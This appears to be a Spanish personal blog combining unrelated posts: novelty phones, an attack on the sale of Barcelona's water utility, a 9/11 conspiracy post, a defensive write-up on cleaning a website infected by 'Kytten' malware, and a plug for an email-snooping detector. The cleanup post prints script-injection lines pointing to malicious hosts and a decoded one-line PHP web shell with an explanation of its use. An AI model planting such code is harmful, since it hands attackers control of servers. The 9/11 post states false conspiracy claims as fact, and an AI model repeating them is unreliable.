Móviles del futuro, reales e inventados

A veces cuando vemos cómo eran los teléfonos de hace 10 años, uno puede preguntarse cómo serán los  teléfonos móviles del futuro y empezar a dejar volar la imaginación.

A continuación una muestra de los teléfonos más extravagantes del mercado y de la imaginación. Adivinen cual es real y cual no. ;)

[youtube mkB81kz6UzQ]

[youtube xH3GPOx12oc]

[youtube M5iTCsitJKU]

Políticos corruptos y La Caixa venden el agua catalana a los franceses

Hoy me he enterado leyendo el diario El País, que el pasado 22 de octubre 2009 la entidad financiera conocida como «La Caixa» (esa que hipócritamente dice que tiene «alma»), ha vendido las aguas de Barcelona (AgBar) a la multinacional francesa Suez.

Según la investigación del diario bolpress.com de Bolivia: «Suez incumplió su contrato y obligó a los hogares pobres a cerrar sus pozos de agua en Indonesia; subió las tarifas hasta un 700% en Filipinas y ahora está a punto de dejar su concesión en Argentina porque el gobierno le ha dicho que no podrá aumentar el costo del servicio.»

pegatina-montillaRecuerdo la gran estafa de la sequía del verano 2008 y la polémica Trama del Trasvase del Ebro, que se inventaron los encorbatados de AgBar, La Caixa, Suez y politicuchos mediocres, que repetían como loros que «Barcelona no tiene agua de boca», ocultando sus verdaderas intenciones financieras.

Un año después hemos sabido que próximamente se abrirán ¡49 hoteles nuevos en Barcelona!

O sea, falta agua porque se han agotado los recursos acuíferos de Barcelona y para solucionarlo, construyen más hoteles y roban el agua a la provincia de al lado, a costa de cargarse el parque natural del Delta del Ebro.

La relación entre el PSC (que no es lo mismo que el PSOE) y «la condonación» de su deuda por parte de las entidades bancarias es más que oscura… aunque peor es el PP que recibe su dinero de «donaciones anónimas»…

Sobre el PSC y su relación con La Caixa aquí van estos enlaces:

montilla_la_caixaPensaba que si los políticos obran así, se debía a que tenían las manos atadas ya que la mayoría de partidos políticos deben mucho dinero a La Caixa.

Pero decidí comprobarlo, así que el Sant Jordi pasado me fui a Las Ramblas de Barcelona para hablar con alguien de Iniciativa Els Verds ya que yo CREÍA que eran ecologistas y hasta ahora les había votado a ellos… (inocente de mi).

Total que llegué a Las Ramblas para hablar con alguien de «los verdes» y me encontré a un zopenco llamado David Cid de Iniciativa per Catalunya Verds (Secretari d’Acció Política i Moviments Socials), que no sólo no tenía ni idea del tema «AgBar, La Caixa y Suez», sinó que me justificó el trasvase! diciendo que «sólo era un tubito así de pequeño» (con las manos hizo una «o» de unos 15 centímetros) » y que no entendía porque la gente del sur se ponían así por un tubito».

Según el alcalde socialista Jordi Hereu i David Cid de Iniciativa per Catalunya Els Verds, esto es "un tubito".

Según el alcalde socialista Jordi Hereu i David Cid de Iniciativa per Catalunya Els Verds, esto es "un tubito".

¡¡¡Un presunto ecologista, que defiende el trasvase de un río!!! esto es increíble… Le dije que le escribiría y le envié mi material sobre la trama del trasvase del Ebro, pero desde abril del 2009 que estoy esperando respuesta (nota posterior, estoy ya a marzo del año 2011 y sigo sin respuesta).

Curiosamente la respuesta de David Cid, es exactamente la misma que me dió el alcalde de Barcelona Jordi Hereu, que también fuí a hablar con él del tema y me soltó las mismas chorradas sobre «tubitos». Es como si alguien les hubiese comido el coco y repitiesen las mismas palabras como si fuesen loros, sin pararse a pensar de las consecuencias a largo plazo de su «tubito».

El monstruo del rompeolas de Barcelona (Hotel Vela)

El monstruo del rompeolas de Barcelona (Hotel Vela)

A los «verdes» mafiosos que tenemos en el poder, les importa un rábano si esto crea un precedente para más adelante hacer un trasvase más grande o si acabará con el Delta del Ebro con sus más de 2.000 especies diferentes de animales y plantas, de las cuales 77 están en peligro de extinción.

Lo importante es que Barcelona siga creciendo imprudentemente y antiecológicamente, con hoteles de lujo para yupis, con agua que no tiene, con hoteles ilegales a dos metros del mar, talando árboles para que una empresa del Opus Dei (Tibidabo) pueda seguir construyendo sus mierdas en lo que antes era una montaña, y aquí no pasaaaa nadaaaaaaa…

Y para acabar, pegatinas anti trasvase del Ebro encontradas en algunas webs y por algunas paredes del metro de Barcelona.

Haz clic  para ampliar.

pegatina-petita-catala

pegatina-gran-catala2


pegatina-petita-salvem-el-delta-petita

pegatina-petita-salvemos-el-delta

pegatina-salvem-lo-delta-de-lebre

[youtube M5L90JBSzsA]

El parlamento japonés se cuestiona el 11S y sospecha de complot

Hace años, el que escribe estas líneas investigó profundamente para refutar la «conspiranoia» sobre si el 11S fue una mentira. Me encontré que muchas personas desde distintos campos de la ciencia, ponían en duda que los atentado de Nueva York fuesen como nos los han contado. Ejemplo de ellos los 500 arquitectos que piden que se reabra una investigación.

No sólo me fue imposible refutarlo, sinó que ahora estoy totalmente convencido que el 11S fue una gran mentira planeada y ejecutada desde de los mismos Estados Unidos. No se si la CIA, los militares, Skull & Bones, o los tres a la vez, pero desde luego ni Bin Laden existe tal como nos lo pintan, ni los talibanes pueden planear algo tan increíblemente complejo como el 11S.

En el parlamento japonés un diputado explicó con numerosos argumentos irrefutables como el 11 de septiembre fue una gran mentira y explican que detrás de un montaje económico y militar tan sofisticado, deben de haber personas muy poderosas y con grandes conocimientos de economía entre otras cosas, y también piensa que es imposible que los talibanes que viven en un monte perdido de Afganistán, puedan diseñar algo así.

Juzguen ustedes mismos y saquen conclusiones…

PARLAMENTO JAPONES SE CUESTIONA EL 11S 1 DE 3
http://www.youtube.com/watch?v=YnrP7d232WI
[youtube YnrP7d232WI]

PARLAMENTO JAPONÉS SE CUESTIONA EL 11S 2 DE 3
http://www.youtube.com/watch?v=l5iwHrTr4jk
[youtube l5iwHrTr4jk]

PARLAMENTO JAPONÉS SE CUESTIONA 11S 3 DE 3
http://www.youtube.com/watch?v=qdo6B8b_69E
[youtube qdo6B8b_69E]

Otros vídeos relacionados con el tema:

Claramente una maldita DEMOLICIÓN controlada !!!!
http://www.youtube.com/watch?v=ud6CVefe1CE
[youtube ud6CVefe1CE]

Bombas 911 demolición controlada
http://www.youtube.com/watch?v=StARyuHvU-Y
[youtube StARyuHvU-Y]

Los motivos para crear un 11S son varios:

1ª Para realizar un buen pelotazo en La Bolsa desde la semana antes del 11S hasta el mismo día del «atentado». El problema para investigarlo, es que todo va a parar a un banco, que por secreto bancario no pueden informar… un banco que gestiona el dinero tanto de la familia Bush como el dinero de la familia de Bin Laden. ¿A que parece increíble? pues es todo verdad.

2º Para crear países enemigos a los que poder  destruir con bombas y luego reconstruir. Casualmente la principal empresa de armas, Carlyle Group, tiene a George Bush Padre entre sus altos cargos. Y casualmente la principal empresa privada que gestiona la «reconstrucción», construye edificios como Guantanamo y bases militares en el extrangero, lleva el tema de comunicaciones, comida, lavandería, etc se llama Halliburton y durante muchos años su director era Dick Cheney (el ex vicepresidente de los EEUU cuando Bush hijo era presidente).

3º También gracias al 11S, la empresa Unocal (también de la antes nombrada Halliburton) ha podido hacer su enorme oleoducto en Afganistán, que lleva petroleo desde el Mar Caspio a los puertos de Turquia (los talibanes están en contra de su construcción desde hace décadas) y «gestionar» los pozos petrolíferos de Iraq.

4ª Han empezado a orientar las leyes en nombre de «la lucha contra el terrorismo» que permiten espiar impunemente a los ciudadanos. Ahora no pasa nada, si nos espían o nos monitorizan por el móvil, las tarjetas VISA o Internet, no importa porque «tenemos democracia».

Pero quién sabe de historia recordará que nada es eterno y los humanos siempre repiten sus errores al cabo de un tiempo… ¿y que hubiese pasado si en la época de Hitler o de Franco, hubiesen poseído la tecnología que hay ahora para controlar al pueblo? Seguramente no hubiese habido «resistencia» y los ingleses no hubiesen podido ganar.

En la próxima dictadura que padezcamos, será imposible escapar al control gubernamental. Vaya miedo….

Ayer matamos a un virus-troyano desconocido que hemos llamado «Kytten»

Pues si, nuestra web ha padecido una infección «rarita» que por suerte la hemos podido parar a tiempo.

El bicho que nos ha infectado, le hemos llamado «Kytten» y a día de hoy, NO LO DETECTAN LOS ANTIVIRUS! (hemos probado con Avast, Ad-aware y Kaspersky).

Primero fue un bicho (chino) llamado «Gumblar» que evolucionó al «Martuz» (martuz.cn), y ahora nos viene la 3ª entrega. Al principio no sabíamos como diantres se ha colado el bicho en nuestra web, pero al final hemos encontrado pistas.

Inicialmente al bicho le detectamos por un mensaje que salía en nuestra web que decía:

Fatal error: Cannot redeclare ally() (previously declared in /index.php(1) : eval()’d code:1) in /wp-config.php(1) : eval()’d code on line 1

Aunque este error cambia según el servidor y el día en que se infectó. Otro ejemplo:

Fatal error: Cannot redeclare qq6k() (previously declared in \index.php(1) : eval()’d code:1) in \wp-config.php(1) : eval()’d code on line 1

Y en el código fuente, salían en ambos caracteres raros  que resulta que es código encriptado en Base64.

¿Cómo se contagia?

Sin entrar en demasiados detalles:

  1. Las páginas infectadas contienen IFRAMES que llaman a un archivo Flash y otro archivo PDF que ambos aprovechan agujeros de seguridad para crear un programa en el Windows (más detalles en «La venganza de los zombies Gumblar» que está en inglés). Da igual si tienes Firefox o IExplorer, si tienes el pluggin de Flash igual o menor a 9.124 (la última versión es 10.0.32.1) o tienes instalado el Acrobat Adobe menor a 9.0 (la última es la versión 9.2.0) tu navegador se infectará de nuevo.
  2. Igual que el Gumblar, una vez el bicho está en el Windows, roba los datos de configuración de los 10 clientes de FTP más populares

¿Cómo eliminarlo?

Para empezar, actualiza tus versiones de Adobe Flash y Acrobat Reader, porque por aquí te entra el bicho. También actualiza tu antivirus, como no.

Para desinfectar, explicamos nuestros pasos. Básicamente hemos realizado 4 pasos: hemos bajado toda la web al disco duro, hemos borrado toda la web del servidor, hemos limpiado la web de basura, y una vez limpio el código lo hemos vuelto a subir todo. Los detalles se explican más adelante.

Si necesitas limpiar tu web, recuerda que el código «maligno» está desperdigado por todo tu servidor. Si mientras subes una parte «limpiada» un usuario visita una parte «aún no limpiada», se volverá a contagiar toda la web. Por tanto, para evitar perder tiempo hay que borrar toda la web por mucho que sea un engorro y volverla a subir limpia.

Para limpiar y eliminar el «virus-troyano-gusano» Kytten, una vez he bajado toda la web al disco, he utilizado la opción de buscar del programa Adobe Dreamweaver, Edición –> Reemplazar –> «Buscar en:» –> «Carpetas». Aunque hay cientos de programas que tienen la misma opción de «buscar-reemplazar» y sirven igual de bien.

dreamweaver

Luego hemos buscado los «códigos malignos» y los hemos sustituido por una cadena vacía. Para saber que «códigos» buscar, hay que saber que hace el Kytten con los archivos:

1.– Infecta los ficheros .PHP con este código:

<?php eval(base64_decode(‘aWYoIWlzc2V0  (BLABLABLA) RfUE9TVFsnZSddKSk7’)); ?>

Lo del (Blablabla) lo pongo porque es un código muy largo y para que nadie confunda esta página con el bicho. Nosotros hemos buscado la cadena «base64_decode» y cuando hemos encontrado una cadena parecida a la del ejemplo(<?php eval(base64_decode(‘aWblablablablabla…) la hemos borrado desde el «<?» hasta el «?>«. Cuando encuentras una cadena de estas, en el resto de las páginas es exactamente la misma cadena y fácilmente encontrable y borrable.

Si es un fichero .ASP, lo infecta con otro código parecido a este:

<script src=http://mashaei.ir/AWStats/admin.php ></script>

Aunque en cada web, el enlace cambia. Para buscar esta cadena ponemos «<script src=http://» y dreamweaver nos va mostrando las páginas que la contienen.

Hemos comprobado que este enlace es una web infectada, seguramente alguien infectado debe tener un enlace a esta web que estas leyendo. Es como una telaraña de webs infectadas que llaman a otras webs infectadas… vaya paranoia.

Hay otro extraño caso, si la página PHP contiene la cadena ‘,a entonces colocará un código «maligno» como el anterior, al final de la página. ¿y porque páginas con la cadena ‘,a ?  pues nadie tiene ni idea.


2. – Al final de los ficheros JavaScript .JS inserta esto:
document.write(‘<script src=http://kytten.co.cc/upload/GFX.php ><\/script>’);

Aunque me comunican que en otras webs la cadena era diferente y ponía cosas como estas:

document.write(‘<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>’);

document.write(‘<script src=http://indiansexporn.com/banners/.ftpquota.php ><\/script>’);

document.write(‘<script src=http://allo.vitebsk.by/include/index.php ><\/script>’);

En otros archivos .JS inserta al final del archivo un código parecido a este:

<!–
(function(vwoQJ){var p8UCz=’%’;var b2HS6=unescape((‘@76ar@20@61@3d@22Sc@72ip@74@   (BLABLABLA)  @3e@22@29@3b@7d’).replace(vwoQJ,p8UCz));eval(b2HS6)})(/@/g);
–>

3.- Infecta los ficheros .HTM y .HTML con el siguiente código, justo antes de la etiqueta <BODY>

<script src=http://kytten.co.cc/upload/GFX.php ></script>

Aunque hay muchas variaciones, otro ejemplo:

<script src=http://allo.vitebsk.by/include/index.php ></script>

4.- En las carpetas con imágenes crea el archivo «gifimg.php» (a veces se llama «images.php» y otras «image.php») que contiene un código encriptado en base64, y que el código desencriptado sirve para introducir comandos PHP directamente en el servidor sin utilizar ningún FTP!!!

El código es algo tipo:

<?php  eval(base64_decode(‘aWYoaXNzZXQoJF9QT1   (BLABLABLA)  m90IEZvdW5kJyk7’));?>

El (BLABLABLA) lo ponemos por lo mismo de antes, que no confundan esta página con el virus. Desencriptado queda:

if(isset($_POST[‘e’]))eval(base64_decode($_POST[‘e’])); else die(‘404 Not Found’);

¡Vaya virguería de programación! no sabemos si sacarnos el sombrero delante del genio (o «genia») que ha creado esto o acordarnos maleducadamente de la profesión de la madre que le parió.

Si alguien escribe la línea de arriba en cualquier página web programada en PHP, tiene el control total de la web. Es tan genial como maquiavélico.

Lo único que hay que hacer es enviar mediante el parámetro «e» lo que se desea en lenguaje PHP. Por ejemplo si la página «infectada» con este código se llama «lista.php», se puede llamar a la página así «lista.php?e=(CÓDIGO PHP QUE SE QUIERA EJECUTAR)».

Aunque esto sería si el método fuese GET, pero en el caso de este bicho utiliza el método POST (seguramente para no dejar rastros en los logs) y la cosa se complica un poco más.

Y esto es todo, espero que todo este conjunto de datos sin sentido le haya sido útil a alguien.

Web para saber si tu novio o tu jefe te espía el correo hotmail

sin-titulo-6Hay ocasiones en que uno tiene la impresión que le están leyendo el correo, quizás un email que aparece abierto, o alguien que sabe algo que tu no has dicho, ya sea por precaución o por paranoia, he descubierto un programa antiespias gratis en español, para comprobar si te están controlando tu cuenta de correo electrónico.

www.anticontrol.com

El programa anti espías en realidad es una web, donde creas una cuenta con la dirección de email «espiada», te envías un «email-trampa», y durante 7 días te vigilan quién lo lee.

Con 7 días se tiene más que suficiente para atrapar al espía… aunque si se necesitan más días, se paga enviando un SMS desde el móvil (vale 1 Euro y pico) así no hay que dar número de tarjetas de crédito ni nada por el estilo.

En anticontrol.com detectan la IP del espía, su navegador, la velocidad del ordenador, los pluggins que tiene instalado, e incluso si haces click en cualquier IP puedes ver en un mapa desde donde se conecta el espía y muestra 7 métodos diferentes de datos relacionados con la IP del espía.

Con tantos datos, es fácil que si haces una denuncia, la policía pueda empapelar al fisgón.
A lo largo de estos años he oído a personas con este tipo de problemas, «alguien me entra en mi cuenta y me borra algunos mensajes, creo que es mi ex-novia», «alguien me lee el MSN y creo que es mi amiga», «Creo que mis padres me leen el correo», «Creo que mi jefe me espía el email», «sabes como puedo hackear la contraseña del hotmail o del Messenger, se me ha olvidado la clave»…

Por no hablar de los cientos de tutoriales que hay en youtube sobre como entrar en cuentas de email de otros, sólo hace falta buscar «recuperar password MSN», aunque el 100% de estos supuestos trucos, son falsos.

Las encuestas realizadas por la estadounidense American Management Association revelan que 3 de cada 5 compañías utiliza algún tipo de programa para vigilar los correos electrónicos de sus empleados.

Según el diario The Register la empresa de seguridad de correo electrónico Proofpoint entrevistó a jefes de 220 empresas que contaban con más de 1.000 empleados. De ello se dedujo que una de cada tres empresas estadounidenses tienen personal cuyo trabajo principal es el de supervisar el correo electrónico de otros compañeros.

Así que con este panorama del futuro, más vale prevenir y asegurarse que no tenemos un fisgón espiándonos.